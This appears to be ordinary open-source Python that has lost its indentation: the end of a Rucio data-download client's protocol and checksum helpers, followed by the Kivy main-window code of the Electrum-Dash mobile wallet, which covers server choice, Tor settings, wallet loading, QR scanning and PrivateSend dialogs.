impl_split = impl.split('.')
if len(impl_split) == 1:
preferred_impls[i] = 'rucio.rse.protocols.' + impl + '.Default'
else:
preferred_impls[i] = 'rucio.rse.protocols.' + impl
i += 1
for source in sources:
if source['rse'] in checked_rses:
continue
try:
rse_settings = rsemgr.get_rse_info(source['rse'], vo=self.client.vo)
checked_rses.append(str(source['rse']))
except RucioException as error:
self.logger(logging.DEBUG, 'Could not get info of RSE %s: %s' % (source['source'], error))
continue
preferred_protocols = [protocol for protocol in reversed(rse_settings['protocols']) if protocol['impl'] in preferred_impls]
if len(preferred_protocols) == 0:
continue
for protocol in preferred_protocols:
if not protocol['domains']['wan'].get("read"):
self.logger(logging.WARNING, 'Unsuitable protocol "%s": "WAN Read" operation is not supported' % (protocol['impl']))
continue
try:
supported_protocol = rsemgr.create_protocol(rse_settings, 'read', impl=protocol['impl'], auth_token=self.auth_token, logger=self.logger)
supported_protocol.connect()
except Exception as error:
self.logger(logging.WARNING, 'Failed to create protocol "%s", exception: %s' % (protocol['impl'], error))
pass
else:
self.logger(logging.INFO, 'Preferred protocol impl supported locally and remotely: %s' % (protocol['impl']))
supported_impl = protocol['impl']
break
return supported_impl
def _verify_checksum(item, path):
rucio_checksum = item.get(PREFERRED_CHECKSUM)
local_checksum = None
checksum_algo = CHECKSUM_ALGO_DICT.get(PREFERRED_CHECKSUM)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
for checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS:
rucio_checksum = item.get(checksum_name)
checksum_algo = CHECKSUM_ALGO_DICT.get(checksum_name)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
return False, None, None
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_dash.dash_ps_util import (PSPossibleDoubleSpendError,
PSSpendToPSAddressesError)
from electrum_dash.storage import WalletStorage, StorageReadWriteError
from electrum_dash.wallet_db import WalletDB
from electrum_dash.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_dash.wallet import update_password_for_directory
from electrum_dash.plugin import run_hook
from electrum_dash import util
from electrum_dash.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis)
from electrum_dash.invoices import PR_PAID, PR_FAILED
from electrum_dash import blockchain
from electrum_dash.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_dash.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_dash.logging import Logger
from electrum_dash.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_dash.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_dash.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_dash.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_dash.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
from .uix.dialogs.dash_kivy import TorWarnDialog
from .uix.dialogs.warn_dialog import WarnDialog
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_dash_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_dash.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_dash.util import (NoDynamicFeeEstimates, NotEnoughFunds,
DASH_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME,
UserFacingException)
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.plugin import Plugins
from electrum_dash.paymentrequest import PaymentRequest
ATLAS_ICON = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/%s'
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on_bp = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on_bp = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on_bp, True)
fiat_bypass_tor_bp = BooleanProperty()
def toggle_fiat_bypass_tor(self, x):
self.fiat_bypass_tor_bp = \
not self.electrum_config.get('fiat_bypass_tor', False)
self.electrum_config.set_key('fiat_bypass_tor',
self.fiat_bypass_tor_bp, True)
coro = self.network.restart()
self.network.run_from_another_thread(coro)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme in [DASH_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME]:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
self.is_android = ('ANDROID_DATA' in os.environ)
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on_bp = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._trigger_update_readiness = Clock.create_trigger(self.update_readiness, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._plugins_dialog = None
self._settings_dialog = None
self._dash_net_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum_dash.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
data_l = data.lower()
if (data_l.startswith(DASH_BIP21_URI_SCHEME + ':')
or data_l.startswith(PAY_BIP21_URI_SCHEME + ':')):
self.set_URI(data)
return
# try to decode transaction
from electrum_dash.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def run_other_app(self, app_name):
if not self.is_android:
return f'Can not start {app_name}, not android system'
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
pm = autoclass('android.content.pm.PackageManager')
activity = PythonActivity.mActivity
pm_ = activity.getPackageManager()
array_pkg = pm_.getInstalledApplications(pm.GET_META_DATA).toArray()
selected_pkg = []
for i in array_pkg:
if "/data/app/" not in getattr(i, "publicSourceDir"):
continue
selected_pkg.append(i)
app_to_launch = app_name
found = False
for i in selected_pkg:
if app_to_launch == getattr(i, "packageName"):
found = True
try:
package_name = getattr(i, "packageName")
app_intent = pm_.getLaunchIntentForPackage(package_name)
app_intent.setAction(Intent.ACTION_VIEW)
app_intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
activity.startActivity(app_intent)
def _run_task(activity, app_intent):
time.sleep(0.25)
activity.startActivity(app_intent)
args = (activity, app_intent)
threading.Thread(target=_run_task, args=args).start()
except Exception as e:
return f'Error on lauhcing {app_name}: {str(e)}'
if not found:
return f'App {app_name} not found'
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.dash.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_dash import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for dash: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified',
'verified-islock', 'excessive-resource-usage']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_mn_list_updated,
['mn-list-diff-updated',
'mn-list-info-updated'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.show_backup_msg()
def show_backup_msg(self):
w = self.wallet
if w and getattr(w.storage, 'backup_message', None):
WarnDialog(w.storage.backup_message, title=_('Information')).open()
w.storage.backup_message = ''
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
def continue_load():
self._load_wallet_by_name(path)
if (self.electrum_config.get('tor_auto_on', True)
and not self.network.detect_tor_proxy()):
TorWarnDialog(self, path, continue_load).open()
else:
continue_load()
def _load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
if db.upgrade_done:
storage.backup_old_version()
if db.check_unfinished_multisig():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.continue_multisig_setup(storage)
else:
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.history_screen.stop_get_data_thread()
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
util.unregister_callback(self.on_ps_callback)
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
if key == 27 and self.is_exit:
if self.wallet:
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if is_mixing and not is_waiting:
def on_want_exit(b):
if b:
from kivy.base import stopTouchApp
stopTouchApp()
d = Question(psman.WAIT_MIXING_STOP_MSG, on_want_exit)
d.open()
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def plugins_dialog(self):
from .uix.dialogs.plugins import PluginsDialog
if self._plugins_dialog is None:
self._plugins_dialog = PluginsDialog(self)
self._plugins_dialog.update()
self._plugins_dialog.open()
def dash_net_dialog(self):
from .uix.dialogs.dash_net import DashNetDialog
if self._dash_net_dialog is None:
self._dash_net_dialog = DashNetDialog(self)
self._dash_net_dialog.update()
self._dash_net_dialog.open()
def privatesend_dialog(self):
if self.wallet.psman.unsupported:
from .uix.dialogs.privatesend import PSDialogUnsupportedPS as psdlg
else:
from .uix.dialogs.privatesend import PSDialog as psdlg
psdlg(self).open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'plugins':
self.plugins_dialog()
elif name == 'dash_net':
self.dash_net_dialog()
elif name == 'privatesend':
self.privatesend_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_dash.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_dash.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_dash_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_dash_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
if self.testnet:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash-testnet.png"
else:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash.png"
self.root.ids.ps_button.icon = self.ps_icon()
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
self._trigger_update_readiness()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
self._trigger_update_readiness()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
wallet, tx = args
if wallet.psman.need_notify(tx.txid()):
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
elif event == 'verified-islock':
self._trigger_update_wallet()
elif event == 'excessive-resource-usage':
self.show_info(args[0])
def on_ps_callback(self, event, *args):
Clock.schedule_once(lambda dt: self.on_ps_event(event, *args))
def on_ps_event(self, event, *args):
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if event == 'ps-data-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
if event == 'ps-reserved-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
elif event in ['ps-state-changes', 'ps-wfl-changes',
'ps-keypairs-changes']:
wallet, msg, msg_type = (*args, None, None)[:3]
if wallet == self.wallet:
self.update_ps_btn(is_mixing, is_waiting)
if msg:
if msg_type and msg_type.startswith('inf'):
self.show_info(msg)
else:
WarnDialog(msg, title=_('PrivateSend')).open()
elif event == 'ps-not-enough-sm-denoms':
wallet, denoms_by_vals = args
if wallet == self.wallet:
q = psman.create_sm_denoms_data(confirm_txt=True)
def create_small_denoms(confirmed):
if confirmed:
self.create_small_denoms(denoms_by_vals)
d = Question(q, create_small_denoms)
d.open()
elif event == 'ps-other-coins-arrived':
wallet, txid = args
if wallet == self.wallet:
q = '\n\n'.join([psman.OTHER_COINS_ARRIVED_MSG1.format(txid),
psman.OTHER_COINS_ARRIVED_MSG2,
psman.OTHER_COINS_ARRIVED_MSG3,
psman.OTHER_COINS_ARRIVED_MSG4,
psman.OTHER_COINS_ARRIVED_Q])
def show_coins_dialog(confirmed):
if confirmed:
self.coins_dialog(1)
d = Question(q, show_coins_dialog)
d.open()
def create_small_denoms(self, denoms_by_vals):
w = self.wallet
psman = w.psman
coins = psman.get_biggest_denoms_by_min_round()
if not coins:
msg = psman.create_sm_denoms_data(no_denoms_txt=True)
self.show_error(msg)
self.create_new_denoms(coins[0:1])
def create_new_denoms(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new denoms transactions'),
self._create_new_denoms, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_denoms_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_denoms(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_denoms_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Denoms workflow with'
f' txids: {", ".join(wfl.tx_order)}')
